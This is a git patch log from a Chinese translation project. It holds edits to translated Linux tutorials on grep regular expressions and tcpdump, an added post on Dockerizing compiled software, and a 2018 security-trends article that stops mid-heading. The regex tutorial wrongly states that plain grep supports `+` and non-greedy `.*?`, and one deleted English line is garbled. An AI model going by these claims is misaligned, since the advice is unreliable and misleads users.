PRF:20171214 Bash Scripting- Learn to use REGEX (Basics).md @kimii --- ... Scripting- Learn to use REGEX (Basics).md | 153 +++++++++--------- 1 file changed, 77 insertions(+), 76 deletions(-) diff --git a/translated/tech/20171214 Bash Scripting- Learn to use REGEX (Basics).md b/translated/tech/20171214 Bash Scripting- Learn to use REGEX (Basics).md index 83e9514054..9203789c0f 100644 --- a/translated/tech/20171214 Bash Scripting- Learn to use REGEX (Basics).md +++ b/translated/tech/20171214 Bash Scripting- Learn to use REGEX (Basics).md @@ -1,136 +1,137 @@ -Bash 脚本:学习使用正则表达式(基础) +Bash 脚本:正则表达式基础篇 ====== -正则表达式(简写为 regex 或者 regexp)基本上是定义一种搜索模式的字符串,可以被用来执行“搜索”或者“搜索并替换”操作,也可以被用来验证像密码策略等条件。 -正则表达式是一个我们可利用的非常强大的工具,并且使用正则表达式最好的事情是它能在几乎所有计算机语言中被使用。所以如果你使用 Bash 脚本或者创建一个 python 程序时,我们可以使用正则表达式或者也可以写一个单行搜索查询。 +正则表达式Regular expressions(简写为 regex 或者 regexp)基本上是定义一种搜索模式的字符串,可以被用来执行“搜索”或者“搜索并替换”操作,也可以被用来验证像密码策略等条件。 -在这篇教程中,我们将会学习一些正则表达式的基本概念,并且学习如何在 Bash 中使用‘grep’时使用它们,但是如果你希望在其他语言如 python 或者 C 中使用它们,你只能使用正则表达式部分。那么让我们通过正则表达式的一个例子开始吧, +正则表达式是一个我们可利用的非常强大的工具,并且使用正则表达式的优点是它能在几乎所有计算机语言中被使用。所以如果你使用 Bash 脚本或者创建一个 python 程序时,我们可以使用正则表达式,或者也可以写一个单行搜索查询。 - **Ex-** 一个正则表达式看起来像 +在这篇教程中,我们将会学习一些正则表达式的基本概念,并且学习如何在 Bash 中通过 `grep` 使用它们,但是如果你希望在其他语言如 python 或者 C 中使用它们,你只能使用正则表达式部分。那么让我们通过正则表达式的一个例子开始吧, - **/t[aeiou]l/** +正则表达式看起来像 `/t[aeiou]l/` 这个样子。 -但这是什么意思呢?它意味着所提到的正则表达式将寻找一个词,它以‘t’开始,在中间包含字母‘a e i o u’中任意一个,并且字母‘l’最为最后一个字符。它可以是‘tel’,‘tal’或者‘til’,匹配可以是一个单独的词或者其它单词像‘tilt’,‘brutal’或者‘telephone’的一部分。 +但这是什么意思呢?它意味着所提到的正则表达式将寻找一个词,它以 `t` 开始,在中间包含字母 `a e i o u` 中任意一个,并且字母 `l` 最为最后一个字符。它可以是 `tel`,`tal` 或者 `til`,可以匹配一个单独的词或者其它单词像 `tilt`,`brutal` 或者 `telephone` 的一部分。 - **grep 使用正则表达式的语法是** +grep 使用正则表达式的语法是 `$ grep "regex_search_term" file_location` - **$ grep "regex_search_term" file_location** +如果不理解,不要担心,这只是一个例子,来展示可以利用正则表达式获取什么,相信我,这是最简单的例子。我们可以从正则表达式中获取更多。现在我们将从正则表达式基础的开始。 -如果头脑中没有想法,不要担心,这只是一个例子,来展示可以利用正则表达式获取什么,并且相信我这是最简单的例子。我们可以从正则表达式中获取更多。现在我们将从正则表达式基础的开始。 +- 推荐阅读: [你应该知道的有用的 linux 命令][1] - **(推荐阅读: [你应该知道的有用的 linux 命令][1])** +### 基础的正则表示式 -## **基础的正则表示式** +现在我们开始学习一些被称为元字符MetaCharacters的特殊字符。它们可以帮助我们创建更复杂的正则表达式搜索项。下面提到的是基本元字符的列表, -现在我们开始学习一些被称为元字符(MetaCharacters)的特殊字符。他们帮助我们创建更复杂的正则表达式搜索项。下面提到的是基本元字符的列表, - - **. or Dot** 将匹配任意字符 - - **[ ]** 将匹配范围内字符 - - **[^ ]** 将匹配除了括号中提到的那个之外的所有字符 - - ***** 将匹配零个或多个前面的项 - - **+** 将匹配一个或多个前面的项 - - **? ** 将匹配零个或一个前面的项 - - **{n}** 将匹配‘n’次前面的项 - - **{n,}** 将匹配‘n’次或更多前面的项 - - **{n m} ** 将匹配在‘n’和‘m’次之间的项 - - **{ ,m}** 将匹配少于或等于‘m’次的项 - - **\ ** 是一个转义字符,当我们需要在我们的搜索中包含一个元字符时使用 +- `.` 点将匹配任意字符 +- `[ ]` 将匹配一个字符范围 +- `[^ ]` 将匹配除了括号中提到的那个之外的所有字符 +- `*` 将匹配零个或多个前面的项 +- `+` 将匹配一个或多个前面的项 +- `?` 将匹配零个或一个前面的项 +- `{n}` 将匹配 n 次前面的项 +- `{n,}` 将匹配 n 次或更多前面的项 +- `{n,m}` 将匹配在 n 和 m 次之间的项 +- `{,m}` 将匹配少于或等于 m 次的项 +- `\` 是一个转义字符,当我们需要在我们的搜索中包含一个元字符时使用 现在我们将用例子讨论所有这些元字符。 -### **. or Dot** +#### `.` (点) -它用于匹配出现在我们搜索项中的任意字符。举个例子,我们可以使用点如 +它用于匹配出现在我们搜索项中的任意字符。举个例子,我们可以使用点如: - **$ grep "d.g" file1** +``` +$ grep "d.g" file1 +``` -这个正则表达式意味着我们在‘file_name’文件中正查找的词以‘d’开始,以‘g’结尾,中间可以有任意字符。同样,我们可以使用任意数量的点作为我们的搜索模式,如 +这个正则表达式意味着我们在名为 ‘file1’ 的文件中查找的词以 `d` 开始,以 `g`结尾,中间可以有 1 个字符的字符串。同样,我们可以使用任意数量的点作为我们的搜索模式,如 `T......h`,这个查询项将查找一个词,以 `T` 开始,以 `h` 结尾,并且中间可以有任意 6 个字符。 - **T ……h** +#### `[ ]` -这个查询项将查找一个词,以‘T’开始,以‘h’结尾,并且中间可以有任意 6 个字符。 +方括号用于定义字符范围。例如,我们需要搜索一些特别的单词而不是匹配任何字符, -### **[ ]** +``` +$ grep "N[oen]n" file2 +``` -方括号用于定义字符的范围。 例如,我们需要搜索一些特别的单词而不是匹配任何字符, +这里,我们正寻找一个单词,以 `N`开头,以 `n` 结尾,并且中间只能有 `o`、`e` 或者 `n` 中的一个。 在方括号中我们可以提到单个到任意数量的字符。 - **$ grep "N[oen]n" file2** +我们在方括号中也可以定义像 `a-e`或者 `1-18` 作为匹配字符的列表。 -这里,我们正寻找一个单词,以‘N’开头,以‘n’结尾,并且中间只能有‘o’,‘e’或者‘n’中的一个。 在方括号中我们可以提到单个到任意数量的字符。 +#### `[^ ]` -我们在方括号中也可以定义像‘a-e’或者‘1-18’作为匹配字符的列表。 +这就像正则表达式的 not 操作。当使用 `[^ ]` 时,它意味着我们的搜索将包括除了方括号内提到的所有字符。例如, -### **[^ ]** +``` +$ grep "St[^1-9]d" file3 +``` -这就像正则表达式的 not 操作。当使用 [^ ] 时,它意味着我们的搜索将包括除了方括号内提到的所有字符。例如, +这意味着我们可以拥有所有这样的单词,它们以 `St` 开始,以字母 `d` 结尾,并且不得包含从 `1` 到 `9` 的任何数字。 - **$ grep "St[^1-9]d" file3** +到现在为止,我们只使用了仅需要在中间查找单个字符的正则表达式的例子,但是如果我们需要更多字符该怎么办呢。假设我们需要找到以一个字符开头和结尾的所有单词,并且在中间可以有任意数量的字符。这就是我们使用乘数元字符如 `+` `*` 与 `?` 的地方。 -这意味着我们可以拥有所有这样的单词,它们以‘St’开始,以字母‘d’结尾,并且不得包含从1到9的任何数字。 +`{n}`、`{n,m}`、`{n,}` 或者 `{,m}` 也是可以在我们的正则表达式项中使用的其他乘数元字符。 -到现在为止,我们只使用了仅需要在中间查找单个字符的正则表达式的例子,但是如果我们需要看的更多该怎么办呢。假设我们需要找到以一个字符开头和结尾的所有单词,并且在中间可以有任意数量的字符。这就是我们使用乘数(multiplier)元字符如 + * & ? 的地方。 +#### `*` (星号) -{n},{n. m},{n , } 或者 { ,m} 也是可以在我们的正则表达式项中使用的其他乘数元字符。 +以下示例匹配字母 `k` 的任意出现次数,包括一次没有: -### * (星号) +``` +$ grep "lak*" file4 +``` -以下示例匹配字母k的任意出现次数,包括一次没有: +它意味着我们可以匹配到 `lake`、`la` 或者 `lakkkk`。 - **$ grep "lak*" file4** +#### `+` -它意味着我们可以匹配到‘lake’,‘la’或者‘lakkkk’ +以下模式要求字符串中的字母 `k` 至少被匹配到一次: -### + +``` +$ grep "lak+" file5 +``` -以下模式要求字符串中的字母k至少被匹配到一次: +这里 `k` 在我们的搜索中至少需要发生一次,所以我们的结果可以为 `lake` 或者 `lakkkk`,但不能是 `la`。 - **$ grep "lak+" file5** - -这里k 在我们的搜索中至少需要发生一次,所以我们的结果可以为‘lake’或者‘lakkkk’,但不能是‘la’。 - -### **?** +#### `?` 在以下模式匹配中 - **$ grep "ba?b" file6** +``` +$ grep "ba?b" file6 +``` -字符串 bb 或 bab,使用‘?’乘数,我们可以有一个或零个字符的出现。 +匹配字符串 `bb` 或 `bab`,使用 `?` 乘数,我们可以有一个或零个字符的出现。 -### **非常重要的提示:** +#### 非常重要的提示 当使用乘数时这是非常重要的,假设我们有一个正则表达式 - **$ grep "S.*l" file7** +``` +$ grep "S.*l" file7 +``` -我们得到的结果是‘small’,‘silly’,并且我们也得到了‘Shane is a little to play ball’。但是为什么我们得到了‘Shane is a little to play ball’,我们只是在搜索中寻找单词,为什么我们得到了整个句子作为我们的输出。 +我们得到的结果是 `small`、`silly`,并且我们也得到了 `Shane is a little to play ball`。但是为什么我们得到了 `Shane is a little to play ball`?我们只是在搜索中寻找单词,为什么我们得到了整个句子作为我们的输出。 -这是因为它满足我们的搜索标准,它以字母‘s’开头,中间有任意数量的字符并以字母‘l’结尾。那么,我们可以做些什么来纠正我们的正则表达式来只是得到单词而不是整个句子作为我们的输出。 +这是因为它满足我们的搜索标准,它以字母 `s` 开头,中间有任意数量的字符并以字母 `l` 结尾。那么,我们可以做些什么来纠正我们的正则表达式来只是得到单词而不是整个句子作为我们的输出。 -我们在正则表达式中需要增加 ? 元字符, +我们在正则表达式中需要增加 `?` 元字符, - **$ grep "S.*?l" file7** +``` +$ grep "S.*?l" file7 +``` 这将会纠正我们正则表达式的行为。 -### **\ or Escape characters** +#### `\` -\ 是当我们需要包含一个元字符或者对正则表达式有特殊含义的字符的时候来使用。例如,我们需要找到所有以点结尾的单词,所以我们可以使用 +`\` 是当我们需要包含一个元字符或者对正则表达式有特殊含义的字符的时候来使用。例如,我们需要找到所有以点结尾的单词,所以我们可以使用: - **$ grep "S.*\\." file8** +``` +$ grep "S.*\\." file8 +``` 这将会查找和匹配所有以一个点字符结尾的词。 -通过这篇基本正则表达式教程,我们现在有一些关于正则表达式如何工作的基本概念。在我们的下一篇教程中,我们将学习一些高级的正则表达式的概念。同时尽可能多地练习,创建正则表达式并试着尽可能多地在你的工作中加入它们。如果有任何疑问或问题,您可以在下面的评论区留言。 +通过这篇基本正则表达式教程,我们现在有一些关于正则表达式如何工作的基本概念。在我们的下一篇教程中,我们将学习一些高级的正则表达式的概念。同时尽可能多地练习,创建正则表达式并试着尽可能多的在你的工作中加入它们。如果有任何疑问或问题,您可以在下面的评论区留言。 -------------------------------------------------------------------------------- @@ -138,7 +139,7 @@ via: http://linuxtechlab.com/bash-scripting-learn-use-regex-basics/ 作者:[SHUSAIN][a] 译者:[kimii](https://github.com/kimii) -校对:[校对者ID](https://github.com/校对者ID) +校对:[wxy](https://github.com/wxy) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 From 94d1c4c1100fb886ce9f698deb4048bbbca94b32 Mon Sep 17 00:00:00 2001 From: wxy Date: Wed, 27 Dec 2017 15:13:26 +0800 Subject: [PATCH 0811/1627] PUB:20171214 Bash Scripting- Learn to use REGEX (Basics).md @kimii https://linux.cn/article-9182-1.html --- .../20171214 Bash Scripting- Learn to use REGEX (Basics).md | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename {translated/tech => published}/20171214 Bash Scripting- Learn to use REGEX (Basics).md (100%) diff --git a/translated/tech/20171214 Bash Scripting- Learn to use REGEX (Basics).md b/published/20171214 Bash Scripting- Learn to use REGEX (Basics).md similarity index 100% rename from translated/tech/20171214 Bash Scripting- Learn to use REGEX (Basics).md rename to published/20171214 Bash Scripting- Learn to use REGEX (Basics).md From 9ef0becb0203131e659404616451073089e981d5 Mon Sep 17 00:00:00 2001 From: darksun Date: Wed, 27 Dec 2017 17:06:23 +0800 Subject: [PATCH 0812/1627] translate done: 20171109 Learn how to use tcpdump command with examples.md --- ...ow to use tcpdump command with examples.md | 136 --------------- ...ow to use tcpdump command with examples.md | 165 ++++++++++++++++++ 2 files changed, 165 insertions(+), 136 deletions(-) delete mode 100644 sources/tech/20171109 Learn how to use tcpdump command with examples.md create mode 100644 translated/tech/20171109 Learn how to use tcpdump command with examples.md diff --git a/sources/tech/20171109 Learn how to use tcpdump command with examples.md b/sources/tech/20171109 Learn how to use tcpdump command with examples.md deleted file mode 100644 index 7df944aacf..0000000000 --- a/sources/tech/20171109 Learn how to use tcpdump command with examples.md +++ /dev/null @@ -1,136 +0,0 @@ -translating by lujun9972 -Learn how to use tcpdump command with examples -====== -Tcpdump command is a famous network packet analysing tool that is used to display TCP\IP & other network packets being transmitted over the network attached to the system on which tcpdump has been installed. Tcpdump uses libpcap library to capture the network packets & is available on almost all Linux/Unix flavors. - -Tcpdump command can read the contents from a network interface or from a previously created packet file or we can also write the packets to a file to be used for later. One must use the tcpdump command as root or as a user with sudo privileges. - -In this tutorial, we are going to discuss the uses of tcpdump command along with some examples, but first let's start with installation of tcpdump on various Linux OS. - - **(Recommended Read:[Monitoring network bandwidth with iftop command][1])** - -### Installation - -By default, tcpdump is available on almost all Linux distributions but if that's not the case for you, install it on your system using the following method. - - **CentOS/RHEL** - -Install tcpdump on CentOS & RHEL using the following command , - - **$ sudo yum install tcpdump** - - **Fedora** - -On Fedora, install tcpdump using the following command, - - **$ dnf install tcpdump** - - **Ubuntu/Debian/Linux Mint** - -On Ubuntu or Debian or Linux Mint, install tcp dumo using the following command, - - **$ apt-get install tcpdump** - -Now that we have install tcpdump on our systems, let's discuss some examples for tcpdump. - -### Examples - - **Get packets from all interfaces** - -To get the network packets from all network interfaces, run the following command, - - **$ tcpdump -i any** - -**Get packets from a single interfaces** - -To get the network packets from a single interface, use - - **$ tcpdump -i eth0** - -**Writing captured packets to file** - -To write all the captured packets to a file, use the '-w' option, - - **$ tcpdump -i eth1 -w packets_file** - -**Reading an old tcpdump file** - -To read an already created, old tcpdump file, use the following command, - - **$ tcpdump -r packets_file** - -**Getting more packets information with readable timestamps** - -To get more information regarding the packets along with readable timestamp, use - - **$ tcpdump -ttttnnvvS** - -**Check packets of whole network** - -To get the packets for whole network, execute the following command from terminal - - **$ tcpdump net 192.168.1.0/24** - -**Check packets based on IP address** - -Get all the packets based on the IP address, whether source or destination or both, using the following command, - - **$ tcpdump host 192.168.1.100** - -To get packets based on source or destination of an IP address, use - - **$ tcpdump src 192.168.1.100** - - **$ tcpdump dst 192.168.1.100** - -**Check packets for a protocol or port number** - -To check all the packets used based on the protocol, run the following command - - **$ tcpdump ssh** - -To get packets for a single port ot for a range of ports, use - - **$ tcpdump port 22** - - **$ tcpdump portrange 22-125** - -We can also use ** 'src'** & **' dst'** options to get packets for ports based on source & destination. - -We can also combine two conditions with AND (and , && ), OR ( or. || ) & EXCEPT (not , ! ). This helps when we have analyze network packets based on the some condtions. - -**Using AND** -We can use 'and' or symbol '&&' to combine two conditions or mote with tcpdump. An example would be, - - **$ tcpdump src 192.168.1.100 && port 22 -w ssh_packets** - -**Using OR** - -OR will check the command agtcpdump -i eth0 src port not 22ainst one the mentioned conditions in the command, like - - **$ tcpdump src 192.168.1.100 or dst 192.168.1.50 && port 22 -w ssh_packets** - - **$ tcpdump port 443 or 80 -w http_packets** - -**Using EXCEPT** - -EXCEPT will be used when we want not fulfill a condition, like - - **$ tcpdump -i eth0 src port not 22** - -This will monitor all the traffic on eth0 but will not capture port 22. - -This was our tutorial on how to install & use tcpdump command to capture the network packets. Please feel free to send in any queries or suggestions using the comment box below. - --------------------------------------------------------------------------------- - -via: http://linuxtechlab.com/learn-use-tcpdump-command-examples/ - -作者:[Shusain ][a] -译者:[lujun9972](https://github.com/lujun9972) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:http://linuxtechlab.com/author/shsuain/ -[1]:http://linuxtechlab.com/monitoring-network-bandwidth-iftop-command/ diff --git a/translated/tech/20171109 Learn how to use tcpdump command with examples.md b/translated/tech/20171109 Learn how to use tcpdump command with examples.md new file mode 100644 index 0000000000..578580ef4c --- /dev/null +++ b/translated/tech/20171109 Learn how to use tcpdump command with examples.md @@ -0,0 +1,165 @@ +通过案例学习 TCPDUMP 命令 +====== +Tcpdump 是一个很常用的网络包分析工具,可以用来显示通过网络传输到本系统的 TCP\IP 以及其他网络的数据包。Tcpdump 使用 libpcap 库来抓取网络报,这个库在几乎存在于所有的 Linux/Unix 中。 + +Tcpdump 可以从网卡或之前创建的数据包文件中读取内容,也可以将包写入文件中以供后续使用。必须是 root 用户或者使用 sudo 特权来运行 tcpdump。 + +在本文中,我们将会通过一些案例来演示如何使用 tcpdump 命令,但首先让我们来看看在各种 Linux 操作系统中是如何安装 tcpdump 的。 + + **(推荐阅读:[使用 iftop 命令监控网络带宽 ][1])** + +### 安装 + +tcpdump 默认在几乎所有的 Linux 发行版中都可用,但若你的 Linux 上没有的话,使用下面方法进行安装。 + +#### CentOS/RHEL + +使用下面命令在 CentOS 和 RHEL 上安装 tcpdump, + +``` +$ sudo yum install tcpdump* +``` + +#### Fedora + +使用下面命令在 Fedora 上安装 tcpdump, + +``` +$ dnf install tcpdump +``` + +#### Ubuntu/Debian/Linux Mint + +在 Ubuntu/Debain/Linux Mint 上使用下面命令安装 tcpdump + +``` +$ apt-get install tcpdump +``` + +安装好 tcpdump 后,现在来看一些例子。 + +### 案例演示 + +#### 从所有网卡中捕获数据包 + +运行下面命令来从所有网卡中捕获数据包,run the following command, + +``` +$ tcpdump -i any +``` + +#### 从指定网卡中捕获数据包 + +要从指定网卡中捕获数据包,运行 + +``` +$ tcpdump -i eth0 +``` + +#### 将捕获的包写入文件 + +使用 ‘-w’ 选项将所有捕获的包写入文件, + +``` +$ tcpdump -i eth1 -w packets_file +``` + +#### 读取之前产生的 tcpdump 文件 + +使用下面命令从之前创建的 tcpdump 文件中读取内容 + +``` +$ tcpdump -r packets_file +``` + +#### 获取更多的包信息并且以可读的形式显示时间戳 + +要获取更多的包信息同时以可读的形式显示时间戳,使用 + +``` +$ tcpdump -ttttnnvvS +``` + +#### 查看整个网络的数据包 + +要获取整个网络的数据包,在终端执行下面命令 + +``` +$ tcpdump net 192.168.1.0/24 +``` + +#### 根据 IP 地址查看报文 + +要获取指定 IP 的数据包,不管是作为源地址还是目的地址,使用下面命令, + +``` +$ tcpdump host 192.168.1.100 +``` + +要指定 IP 地址是源地址或是目的地址则使用 + +``` +$ tcpdump src 192.168.1.100 +$ tcpdump dst 192.168.1.100 +``` + +#### 查看某个协议或端口号的数据包 + +要查看某个协议的数据包,运行下面命令 + +``` +$ tcpdump ssh +``` + +要捕获某个端口或一个范围的数据包,使用 + +``` +$ tcpdump port 22 +$ tcpdump portrange 22-125 +``` + +我们也可以与 'src' 和 'dst' 选项连用来捕获指定源端口或指定目的端口的报文 + +我们还可以使用 AND (与,&& ),OR ( 或。|| ) & EXCEPT (非,!) 来将两个条件组合起来。当我们需要基于某些条件来分析网络报文是非常有用。 + +#### 使用 AND + +可以使用 'and' 或者符号 '&&' 来将两个或多个条件组合起来。比如, + +``` +$ tcpdump src 192.168.1.100 && port 22 -w ssh_packets +``` + +#### 使用 OR + +OR 会检查是否匹配命令所列条件中的其中一条,像这样 + +``` +$ tcpdump src 192.168.1.100 or dst 192.168.1.50 && port 22 -w ssh_packets +$ tcpdump port 443 or 80 -w http_packets +``` + +#### 使用 EXCEPT + +当我们想表达不匹配某项条件时可以使用 EXCEPT,像这样 + +``` +$ tcpdump -i eth0 src port not 22 +``` + +这会捕获 eth0 上除了 22 号端口的所有通讯。 + +我们的教程至此就结束了,在本教程中我们讲解了如何安装并使用 tcpdump 来捕获网络数据包。如有任何疑问或建议,欢迎留言。 + +-------------------------------------------------------------------------------- + +via: http://linuxtechlab.com/learn-use-tcpdump-command-examples/ + +作者:[Shusain ][a] +译者:[lujun9972](https://github.com/lujun9972) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://linuxtechlab.com/author/shsuain/ +[1]:http://linuxtechlab.com/monitoring-network-bandwidth-iftop-command/ From 2012a9a6780a4b750b3d5e1192f9696142de260d Mon Sep 17 00:00:00 2001 From: darksun Date: Wed, 27 Dec 2017 17:10:38 +0800 Subject: [PATCH 0813/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Dockerizing=20C?= =?UTF-8?q?ompiled=20Software=20=E2=94=88=20Tianon's=20Ramblings=20?= =?UTF-8?q?=E2=9C=BF?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...Compiled Software - Tianon-s Ramblings .md | 41 +++++++++++++++++++ 1 file changed, 41 insertions(+) create mode 100644 sources/tech/20171226 Dockerizing Compiled Software - Tianon-s Ramblings .md diff --git a/sources/tech/20171226 Dockerizing Compiled Software - Tianon-s Ramblings .md b/sources/tech/20171226 Dockerizing Compiled Software - Tianon-s Ramblings .md new file mode 100644 index 0000000000..252180f1fd --- /dev/null +++ b/sources/tech/20171226 Dockerizing Compiled Software - Tianon-s Ramblings .md @@ -0,0 +1,41 @@ +Dockerizing Compiled Software ┈ Tianon's Ramblings ✿ +====== +I recently went through a stint of closing a huge number of issues in the [docker-library/php][1] repository, and one of the oldest (and longest) discussions was related to installing depedencies for a compiling extensions, and I wrote a [semi-long comment][2] explaining how I do this in a general way for any software I wish to Dockerize. + +I'm going to copy most of that comment here and perhaps expand a little bit more in order to have a better/cleaner place to link to! + +The first step I take is to write the naive version of the `Dockerfile`: download the source, run `./configure && make` etc, clean up. I then try building my naive creation, and in doing so hope for an error message. (yes, really!) + +The error message will usually take the form of something like `error: could not find "xyz.h"` or `error: libxyz development headers not found`. + +If I'm building in Debian, I'll hit `https://packages.debian.org/file:xyz.h` (replacing "xyz.h" with the name of the header file from the error message), or even just Google something like "xyz.h debian", to figure out the name of the package I require. + +If I'm building in Alpine, I'll use to perform a similar search. + +The same works to some extent for "libxyz development headers", but in my experience Google works better for those since different distributions and projects will call these development packages by different names, so sometimes it's a little harder to figure out exactly which one is the "right" one to install. + +Once I've got a package name, I add that package name to my `Dockerfile`, rinse, and repeat. Eventually, this usually leads to a successful build. Occationally I find that some library either isn't in Debian or Alpine, or isn't new enough, and I've also got to build it from source, but those instances are rare in my own experience - YMMV. + +I'll also often check the source for the Debian (via ) or Alpine (via ) package of the software I'm looking to compile, especially paying attention to `Build-Depends` (ala [`php7.0=7.0.26-1`'s `debian/control` file][3]) and/or `makedepends` (ala [`php7`'s `APKBUILD` file][4]) for package name clues. + +Personally, I find this sort of detective work interesting and rewarding, but I realize I'm probably a bit of a unique creature. Another good technique I use occationally is to determine whether anyone else has already Dockerized the thing I'm trying to, so I can simply learn directly from their `Dockerfile` which packages I'll need to install. + +For the specific case of PHP extensions, there's almost always someone who's already figured out what's necessary for this or that module, and all I have to do is some light detective work to find them. + +Anyways, that's my method! Hope it's helpful, and happy hunting! + +-------------------------------------------------------------------------------- + +via: https://tianon.github.io/post/2017/12/26/dockerize-compiled-software.html + +作者:[Tianon Gravi][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://tianon.github.io +[1]:https://github.com/docker-library/php +[2]:https://github.com/docker-library/php/issues/75#issuecomment-353673374 +[3]:https://sources.debian.org/src/php7.0/7.0.26-1/debian/control/ +[4]:https://git.alpinelinux.org/cgit/aports/tree/community/php7/APKBUILD?id=d0ca197f031f96d4664cafaa618aeccf94640a1e From a3a26a0968a53a99170d6a226de0be1444c2a341 Mon Sep 17 00:00:00 2001 From: darksun Date: Wed, 27 Dec 2017 17:23:13 +0800 Subject: [PATCH 0814/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=2018=20Cyber-Secu?= =?UTF-8?q?rity=20Trends=20Organizations=20Need=20to=20Brace=20for=20in=20?= =?UTF-8?q?2018?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...Organizations Need to Brace for in 2018.md | 116 ++++++++++++++++++ 1 file changed, 116 insertions(+) create mode 100644 sources/tech/20171222 18 Cyber-Security Trends Organizations Need to Brace for in 2018.md diff --git a/sources/tech/20171222 18 Cyber-Security Trends Organizations Need to Brace for in 2018.md b/sources/tech/20171222 18 Cyber-Security Trends Organizations Need to Brace for in 2018.md new file mode 100644 index 0000000000..09223ccb21 --- /dev/null +++ b/sources/tech/20171222 18 Cyber-Security Trends Organizations Need to Brace for in 2018.md @@ -0,0 +1,116 @@ +18 Cyber-Security Trends Organizations Need to Brace for in 2018 +====== + +### 18 Cyber-Security Trends Organizations Need to Brace for in 2018 + +Enterprises, end users and governments faced no shortage of security challenges in 2017. Some of those same challenges will continue into 2018, and there will be new problems to solve as well. Ransomware has been a concern for several years and will likely continue to be a big issue in 2018. The new year is also going to bring the formal introduction of the European Union's General Data Protection Regulation (GDPR), which will impact how organizations manage private information. A key trend that emerged in 2017 was an increasing use of artificial intelligence (AI) to help solve cyber-security challenges, and that's a trend that will continue to accelerate in 2018. What else will the new year bring? In this slide show, eWEEK presents 18 security predictions for the year ahead from 18 security experts. + + +### Africa Emerges as New Area for Threat Actors and Targets + +"In 2018, Africa will emerge as a new focus area for cyber-threats--both targeting organizations based there and attacks originating from the continent. With its growth in technology adoption and operations and rising economy, and its increasing number of local resident threat actors, Africa has the largest potential for net-new impactful cyber events." -Steve Stone, IBM X-Force IRIS + + +### AI vs. AI + +"2018 will see a rise in AI-based attacks as cyber-criminals begin using machine learning to spoof human behaviors. The cyber-security industry will need to tune their own AI tools to better combat the new threats. The cat and mouse game of cybercrime and security innovation will rapidly escalate to include AI-enabled tools on both sides." --Caleb Barlow, vice president of Threat Intelligence, IBM Security + + +### Cyber-Security as a Growth Driver + +"CEOs view cyber-security as one of their top risks, but many also see it as an opportunity to innovate and find new ways to generate revenue. In 2018 and beyond, effective cyber-security measures will support companies that are transforming their security, privacy and continuity controls in an effort to grow their businesses." -Greg Bell, KMPG's Global Cyber Security Practice co-leader + + +### GDPR Means Good Enough Isn't Good Enough + +"Too many professionals share a 'good enough' philosophy that they've adopted from their consumer mindset that they can simply upgrade and patch to comply with the latest security and compliance best practices or regulations. In 2018, with the upcoming enforcement of the EU GDPR 'respond fast' rules, organizations will quickly come to terms, and face fines, with why 'good enough' is not 'good' anymore." -Kris Lovejoy, CEO of BluVector + + +### Consumerization of Cyber-Security + +"2018 will mark the debut of the 'consumerization of cyber-security.' This means consumers will be offered a unified, comprehensive suite of security offerings, including, in addition to antivirus and spyware protection, credit and identify abuse monitoring and identity restoration. This is a big step forward compared to what is available in one package today. McAfee Total Protection, which safeguards consumer identities in addition to providing virus and malware protection, is an early, simplified example of this. Consumers want to feel more secure." -Don Dixon, co-founder and managing director, Trident Capital Cybersecurity + + +### Ransomware Will Continue + +"Ransomware will continue to plague organizations with 'old' attacks 'refreshed' and reused. The threat of ransomware will continue into 2018. This year we've seen ransomware wreak havoc across the globe with both WannaCry and NotPetya hitting the headlines. Threats of this type and on this scale will be a common feature of the next 12 months." -Andrew Avanessian, chief operating officer at Avecto + + +### More Encryption Will Be Needed + +"It will become increasingly clear in the industry that HTTPS does not offer the robust security and end-to-end encryption as is commonly believed, and there will be a push to encrypt data before it is sent over HTTPS." -Darren Guccione, CEO and co-founder, Keeper Security + + +### Denial of Service Will Become Financially Lucrative + +"Denial of service will become as financially lucrative as identity theft. Using stolen identities for new account fraud has been the major revenue driver behind breaches. However, in recent years ransomware attacks have caused as much if not more damage, as increased reliance on distributed applications and cloud services results in massive business damage when information, applications or systems are held hostage by attackers." -John Pescatore. SANS' director of emerging security trends + + +### Goodbye Social Security Number + +"2018 is the turning point for the retirement of the Social Security number. At this point, the vast majority of SSNs are compromised, and we can no longer rely on them--nor should we have previously." -Michael Sutton, CISO, Zscaler + + +### Post-Quantum Cyber-Security Discussion Warms Up the Boardroom + +"The uncertainty of cyber-security in a post-quantum world is percolating some circles, but 2018 is the year the discussions gain momentum in the top levels of business. As security experts grapple with preparing for a post-quantum world, top executives will begin to ask what can be done to ensure all of our connected 'things' remain secure." -Malte Pollmann, CEO of Utimaco + + +### Market Consolidation Is Coming + +"There will be accelerated consolidation of cyber niche markets flooded with too many 'me-too' companies offering extremely similar products and services. As an example, authentication, end-point security and threat intelligence now boast a total of more than 25 competitors. Ultimately, only three to six companies in each niche can survive." -Mike Janke, co-founder of DataTribe + + +### Health Care Will Be a Lucrative Target + +"Health records are highly valued on the black market because they are saturated with Personally Identifiable Information (PII). Health care institutions will continue to be a target as they have tighter allocations for security in their IT budgets. Also, medical devices are hard to update and often run on older operating system versions." -Larry Cashdollar, senior engineer, Security Intelligence Response Team, Akamai + + +### 2018: The Year of Simple Multifactor Authentication for SMBs + +"Unfortunately, effective multifactor authentication (MFA) solutions have remained largely out of reach for the average small- and medium-sized business. Though enterprise multifactor technology is quite mature, it often required complex on-premises solutions and expensive hardware tokens that most small businesses couldn't afford or manage. However, the growth of SaaS and smartphones has introduced new multifactor solutions that are inexpensive and easy for small businesses to use. Next year, many SMBs will adopt these new MFA solutions to secure their more privileged accounts and users. 2018 will be the year of MFA for SMBs." -Corey Nachreiner, CTO at WatchGuard Technologies + + +### Automation Will Improve the IT Skills 